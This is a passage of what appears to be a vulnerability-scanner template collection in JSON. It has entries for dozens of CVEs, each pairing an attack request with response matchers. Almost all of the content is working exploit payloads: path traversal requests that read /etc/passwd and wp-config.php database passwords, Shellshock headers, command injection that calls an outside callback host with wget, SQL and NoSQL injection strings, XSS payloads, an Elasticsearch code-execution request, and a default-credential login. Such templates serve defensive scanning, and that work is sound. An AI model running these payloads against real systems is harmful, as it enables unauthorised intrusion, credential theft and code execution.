Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/webproc?getpage=/etc/passwd&var:page=deviceinfo"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-3206","info":{"name":"Seagate BlackArmor NAS - Command Injection","severity":"critical"},"requests":[{"raw":["GET /backupmgt/localJob.php?session=fail;wget http://{{interactsh-url}}; HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n","GET /backupmgt/pre_connect_check.php?auth_name=fail;wget http://{{interactsh-url}}; HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n"],"unsafe":true,"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2014-4535","info":{"name":"Import Legacy Media <= 0.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/import-legacy-media/getid3/demos/demo.mimeonly.php?filename=filename%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["'></script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-4942","info":{"name":"WordPress EasyCart <2.0.6 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/wp-easycart/inc/admin/phpinfo.php"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["PHP Extension","PHP Version"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","part":"body","group":1,"regex":[">PHP Version <\\/td><td class=\"v\">([0-9.]+)"]}]}]},{"id":"CVE-2014-6271","info":{"name":"ShellShock - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}","{{BaseURL}}/cgi-bin/status","{{BaseURL}}/cgi-bin/stats","{{BaseURL}}/cgi-bin/test","{{BaseURL}}/cgi-bin/status/status.cgi","{{BaseURL}}/test.cgi","{{BaseURL}}/debug.cgi","{{BaseURL}}/cgi-bin/test-cgi"],"stop-at-first-match":true,"headers":{"Shellshock":"() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd ","Referer":"() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd ","Cookie":"() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd "},"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-2383","info":{"name":"Dompdf < v0.6.0 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/dompdf.php?input_file=php://filter/resource=/etc/passwd","{{BaseURL}}/PhpSpreadsheet/Writer/PDF/DomPDF.php?input_file=php://filter/resource=/etc/passwd","{{BaseURL}}/lib/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd","{{BaseURL}}/includes/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd","{{BaseURL}}/wp-content/plugins/web-portal-lite-client-portal-secure-file-sharing-private-messaging/includes/libs/pdf/dompdf.php?input_file=php://filter/resource=/etc/passwd","{{BaseURL}}/wp-content/plugins/buddypress-component-stats/lib/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd","{{BaseURL}}/wp-content/plugins/abstract-submission/dompdf-0.5.1/dompdf.php?input_file=php://filter/resource=/etc/passwd","{{BaseURL}}/wp-content/plugins/post-pdf-export/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd","{{BaseURL}}/wp-content/plugins/blogtopdf/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd","{{BaseURL}}/wp-content/plugins/gboutique/library/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd","{{BaseURL}}/wp-content/plugins/wp-ecommerce-shop-styling/includes/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/pdf","filename=\"dompdf_out.pdf\""],"condition":"and"},{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-8676","info":{"name":"Simple Online Planning Tool <1.3.2 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/process/feries.php?fichier=../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-8682","info":{"name":"Gogs (Go Git Service) - SQL Injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/v1/repos/search?q=%27)%09UNION%09SELECT%09*%09FROM%09(SELECT%09null)%09AS%09a1%09%09JOIN%09(SELECT%091)%09as%09u%09JOIN%09(SELECT%09user())%09AS%09b1%09JOIN%09(SELECT%09user())%09AS%09b2%09JOIN%09(SELECT%09null)%09as%09a3%09%09JOIN%09(SELECT%09null)%09as%09a4%09%09JOIN%09(SELECT%09null)%09as%09a5%09%09JOIN%09(SELECT%09null)%09as%09a6%09%09JOIN%09(SELECT%09null)%09as%09a7%09%09JOIN%09(SELECT%09null)%09as%09a8%09%09JOIN%09(SELECT%09null)%09as%09a9%09JOIN%09(SELECT%09null)%09as%09a10%09JOIN%09(SELECT%09null)%09as%09a11%09JOIN%09(SELECT%09null)%09as%09a12%09JOIN%09(SELECT%09null)%09as%09a13%09%09JOIN%09(SELECT%09null)%09as%09a14%09%09JOIN%09(SELECT%09null)%09as%09a15%09%09JOIN%09(SELECT%09null)%09as%09a16%09%09JOIN%09(SELECT%09null)%09as%09a17%09%09JOIN%09(SELECT%09null)%09as%09a18%09%09JOIN%09(SELECT%09null)%09as%09a19%09%09JOIN%09(SELECT%09null)%09as%09a20%09%09JOIN%09(SELECT%09null)%09as%09a21%09%09JOIN%09(SELECT%09null)%09as%09a22%09where%09(%27%25%27=%27"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"ok\":true","\"data\"","\"repolink\":\""],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-9606","info":{"name":"Netsweeper 4.0.8 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/webadmin/policy/category_table_ajax.php?customctid=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-9094","info":{"name":"WordPress DZS-VideoGallery Plugin Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/dzs-videogallery/deploy/designer/preview.php?swfloc=%22%3E%3Cscript%3Ealert(1)%3C/script%3E"],"matchers-condition":"and","matchers":[{"type":"word","words":["<script>alert(1)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-4513","info":{"name":"ActiveHelper LiveHelp Server 3.1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/activehelper-livehelp/server/offline.php?MESSAGE=MESSAGE%3C%2Ftextarea%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&DOMAINID=DOMAINID&COMPLETE=COMPLETE&TITLE=TITLE&URL=URL&COMPANY=COMPANY&SERVER=SERVER&PHONE=PHONE&SECURITY=SECURITY&BCC=BCC&EMAIL=EMAIL%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&NAME=NAME%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</textarea></script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-5368","info":{"name":"WordPress Plugin WP Content Source Control - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/wp-source-control/downloadfiles/download.php?path=../../../../wp-config.php"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["DB_NAME","DB_PASSWORD"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-1203","info":{"name":"Eyou E-Mail <3.6 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /webadm/?q=moni_detail.do&action=gragh HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ntype='|cat /etc/passwd||'\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-9607","info":{"name":"Netsweeper 4.0.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/remotereporter/load_logfiles.php?server=018192&url=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-9444","info":{"name":"Frontend Uploader <= 0.9.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?page_id=0&&errors[fu-disallowed-mime-type][0][name]=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-4210","info":{"name":"Oracle Weblogic - SSRF in SearchPublicRegistries.jsp","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://{{interactsh-url}}"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-9617","info":{"name":"Netsweeper 3.0.6 - Open Redirection","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/remotereporter/load_logfiles.php?server=127.0.0.1&url=https://interact.sh/"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]}]}]},{"id":"CVE-2014-9615","info":{"name":"Netsweeper 4.0.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/webadmin/deny/index.php?dpid=1&dpruleid=1&cat=1&ttl=5018400&groupname=<group_name_eg_netsweeper_student_allow_internet_access&policyname=auto_created&username=root&userip=127.0.0.1&connectionip=127.0.0.1&nsphostname=netsweeper&url=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-2908","info":{"name":"Siemens SIMATIC S7-1200 CPU - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/Portal/Portal.mwsl?PriNav=Bgz&filtername=Name&filtervalue=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&Send=Filter"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-9119","info":{"name":"WordPress DB Backup <=4.5 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/db-backup/download.php?file=../../../wp-config.php"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["DB_NAME","DB_PASSWORD"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-4558","info":{"name":"WooCommerce Swipe <= 2.7.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/swipehq-payment-gateway-woocommerce/test-plugin.php?api_url=api_url%27%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3E "],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["'><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-3120","info":{"name":"ElasticSearch v1.1.1/1.2 RCE","severity":"medium"},"requests":[{"raw":["POST /_search?pretty HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nAccept-Language: en\nContent-Type: application/x-www-form-urlencoded\n\n{\n    \"size\": 1,\n    \"query\": {\n      \"filtered\": {\n        \"query\": {\n          \"match_all\": {\n          }\n        }\n      }\n    },\n    \"script_fields\": {\n        \"command\": {\n            \"script\": \"import java.io.*;new java.util.Scanner(Runtime.getRuntime().exec(\\\"cat /etc/passwd\\\").getInputStream()).useDelimiter(\\\"\\\\\\\\A\\\").next();\"\n        }\n    }\n}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/json"]},{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-4940","info":{"name":"WordPress Plugin Tera Charts - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/tera-charts/charts/zoomabletreemap.php?fn=../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-10037","info":{"name":"DomPHP 0.83 - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/photoalbum/index.php?urlancien=&url=../../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-6287","info":{"name":"HTTP File Server <2.3c - Remote Command Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/?search==%00{.cookie|{{str1}}|value%3d{{str2}}.}"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<title>HFS /</title>"]},{"type":"word","part":"header","words":["Set-Cookie: {{str1}}={{str2}};","text/html"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-4550","info":{"name":"Shortcode Ninja <= 1.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/shortcode-ninja/preview-shortcode-external.php?shortcode=shortcode%27%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3e"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["'><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-5258","info":{"name":"webEdition 6.3.8.0 - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/webEdition/showTempFile.php?file=../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-8799","info":{"name":"WordPress Plugin DukaPress 2.5.2 - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/dukapress/lib/dp_image.php?src=../../../../wp-config.php"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["DB_NAME","DB_PASSWORD","DB_USER","DB_HOST"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-4539","info":{"name":"Movies <= 0.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/movies/getid3/demos/demo.mimeonly.php?filename=filename%27%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["'><script>alert(document.cookie)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-9618","info":{"name":"Netsweeper - Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/webadmin/clientlogin/?srid=&action=showdeny&url="],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["name=formtag action=\"../clientlogin/?srid=&action=showdeny&url=\"","placeholder=\"Profile Manager\">","<title>Netsweeper WebAdmin</title>"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-2323","info":{"name":"Lighttpd 1.4.34 SQL Injection and Path Traversal","severity":"critical"},"requests":[{"raw":["GET /etc/passwd HTTP/1.1\nHost: [::1]' UNION SELECT '/\n\n"],"unsafe":true,"matchers":[{"type":"regex","regex":["root:[x*]:0:0:"]}]}]},{"id":"CVE-2014-9614","info":{"name":"Netsweeper 4.0.5 - Default Weak Account","severity":"critical"},"requests":[{"raw":["POST /webadmin/auth/verification.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nReferer: {{BaseURL}}/webadmin/start/\n\nlogin=branding&password=branding&Submit=Login\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["Location: ../common/","Location: ../start/"],"condition":"or"},{"type":"word","part":"header","words":["Set-Cookie: webadminU="]},{"type":"status","status":[302]}]}]},{"id":"CVE-2014-9609","info":{"name":"Netsweeper 4.0.8 - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/webadmin/reporter/view_server_log.php?act=stats&filename=log&offset=1&count=1&sortorder=0&filter=0&log=../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-9608","info":{"name":"Netsweeper 4.0.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/webadmin/policy/group_table_ajax.php/%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["webadminU=","webadmin="],"condition":"or"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-4544","info":{"name":"Podcast Channels < 0.28 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/podcast-channels/getid3/demos/demo.write.php?Filename=Filename%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-3704","info":{"name":"Drupal SQL Injection","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}/?q=node&destination=node"],"body":"pass=lol&form_build_id=&form_id=user_login_block&op=Log+in&name[0 or updatexml(0x23,concat(1,md5({{num}})),1)%23]=bob&name[0]=a","matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["PDOException","{{md5({{num}})}}"],"condition":"and"},{"type":"status","status":[500]}]}]},{"id":"CVE-2014-2321","info":{"name":"ZTE Cable Modem Web Shell","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/web_shell_cmd.gch"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["please input shell command","ZTE Corporation. All rights reserved"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-5111","info":{"name":"Fonality trixbox - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/maint/modules/endpointcfg/endpointcfg.php?lang=../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-4561","info":{"name":"Ultimate Weather Plugin <= 1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/ultimate-weather-plugin/magpierss/scripts/magpie_debug.php?url=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-3744","info":{"name":"Node.js st module Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/public/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-6308","info":{"name":"Osclass Security Advisory 3.4.1 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/osclass/oc-admin/index.php?page=appearance&action=render&file=../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-4536","info":{"name":"Infusionsoft Gravity Forms Add-on < 1.5.7 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/infusionsoft/Infusionsoft/tests/notAuto_test_ContactService_pauseCampaign.php?go=go%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&contactId=contactId%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&campaignId=campaignId%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"></script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2005-3344","info":{"name":"Horde Groupware Unauthenticated Admin Access","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/horde/admin/user.php","{{BaseURL}}/admin/user.php"],"headers":{"Content-Type":"text/html"},"matchers-condition":"and","matchers":[{"type":"word","words":["<title>Horde :: User Administration</title>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2005-4385","info":{"name":"Cofax <=2.0RC3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/search.htm?searchstring2=&searchstring=%27%3E%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["'>\"</script><script>alert(document.domain)</script>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2005-3634","info":{"name":"SAP Web Application Server 6.x/7.0 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/sap/bc/BSp/sap/menu/fameset.htm?sap--essioncmd=close&sapexiturl=https%3a%2f%2finteract.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2005-2428","info":{"name":"Lotus Domino R5 and R6 WebMail - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/names.nsf/People?OpenView"],"matchers-condition":"and","matchers":[{"type":"regex","name":"domino-username","part":"body","regex":["(<a href=\"/names\\.nsf/[0-9a-z\\/]+\\?OpenDocument)"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-10148","info":{"name":"SolarWinds Orion API - Auth Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/web.config.i18n.ashx?l={{string}}&v={{string}}","{{BaseURL}}/SWNetPerfMon.db.i18n.ashx?l={{string}}&v={{string}}"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["SolarWinds.Orion.Core.","Connection String"],"condition":"or"},{"type":"word","part":"header","words":["text/plain"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-10547","info":{"name":"rConfig 3.9.4 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/compliancepolicyelements.inc.php?search=True&searchField=antani'+union+select+(select+concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d)+limit+0,1),NULL,NULL,NULL,NULL+--+&searchColumn=elementName&searchOption=contains"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["[project-discovery]"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-2103","info":{"name":"Jenkins <=2.218 - Information Disclosure","severity":"medium"},"requests":[{"raw":["GET {{BaseURL}}/whoAmI/ HTTP/1.1\nHost: {{Hostname}}\n","GET {{BaseURL}}/whoAmI/ HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html","x-jenkins"],"case-insensitive":true,"condition":"and"},{"type":"word","part":"body_2","words":["Cookie","SessionId: null"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"kval","kval":["x_jenkins"]}]}]},{"id":"CVE-2020-5307","info":{"name":"PHPGurukul Dairy Farm Shop Management System 1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /dfsms/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername=admin%27+or+%271%27+%3D+%271%27%3B+--+-&password=A&login=\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["add-category.php"]},{"type":"status","status":[302]}]}]},{"id":"CVE-2020-24550","info":{"name":"EpiServer Find <13.2.7 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/find_v2/_click?_t_id=&_t_q=&_t_hit.id=&_t_redirect=https://interact.sh"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["Location: https://interact.sh"]},{"type":"status","status":[301]}]}]},{"id":"CVE-2020-35848","info":{"name":"Agentejo Cockpit <0.12.0 - NoSQL Injection","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/auth/newpassword"],"body":"{\n  \"token\": {\n    \"$func\": \"var_dump\"\n  }\n}\n","headers":{"Content-Type":"application/json"},"matchers":[{"type":"regex","part":"body","regex":["string\\([0-9]{1,3}\\)(\\s)?\"rp-([a-f0-9-]+)\""]}]}]},{"id":"CVE-2020-25213","info":{"name":"WordPress File Manager Plugin - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: multipart/form-data; boundary=------------------------ca81ac1fececda48\n\n--------------------------ca81ac1fececda48\nContent-Disposition: form-data; name=\"reqid\"\n\n17457a1fe6959\n--------------------------ca81ac1fececda48\nContent-Disposition: form-data; name=\"cmd\"\n\nupload\n--------------------------ca81ac1fececda48\nContent-Disposition: form-data; name=\"target\"\n\nl1_Lw\n--------------------------ca81ac1fececda48\nContent-Disposition: form-data; name=\"mtime[]\"\n\n1576045135\n--------------------------ca81ac1fececda48\nContent-Disposition: form-data; name=\"upload[]\"; filename=\"poc.txt\"\nContent-Type: text/plain\n\npoc-test\n--------------------------ca81ac1fececda48--\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["poc.txt","added"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-25495","info":{"name":"Xinuo Openserver 5/6 - Cross-Site scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/manlist?section=%22%3E%3Ch1%3Ehello%3C%2Fh1%3E%3Cscript%3Ealert(/{{randstr}}/)%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<h1>hello</h1><script>alert(/{{randstr}}/)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-22840","info":{"name":"b2evolution CMS <6.11.6 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/email_passthrough.php?email_ID=1&type=link&email_key=5QImTaEHxmAzNYyYvENAtYHsFu7fyotR&redirect_to=http%3A%2F%2Finteract.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_]*\\.)?interact\\.sh(?:\\s*?)$"]}]}]},{"id":"CVE-2020-5777","info":{"name":"Magento Mass Importer  <0.7.24 - Remote Auth Bypass","severity":"critical"},"requests":[{"raw":["GET /index.php/catalogsearch/advanced/result/?name=e HTTP/1.1\nHost: {{Hostname}}\nConnection: close\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Too many connections"]},{"type":"status","status":[503]}]}]},{"id":"CVE-2020-17505","info":{"name":"Artica Web Proxy 4.30 - OS Command Injection","severity":"high"},"requests":[{"raw":["GET /fw.login.php?apikey=%27UNION%20select%201,%27YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=%27; HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n","GET /cyrus.index.php?service-cmds-peform=%7C%7Cwhoami%7C%7C 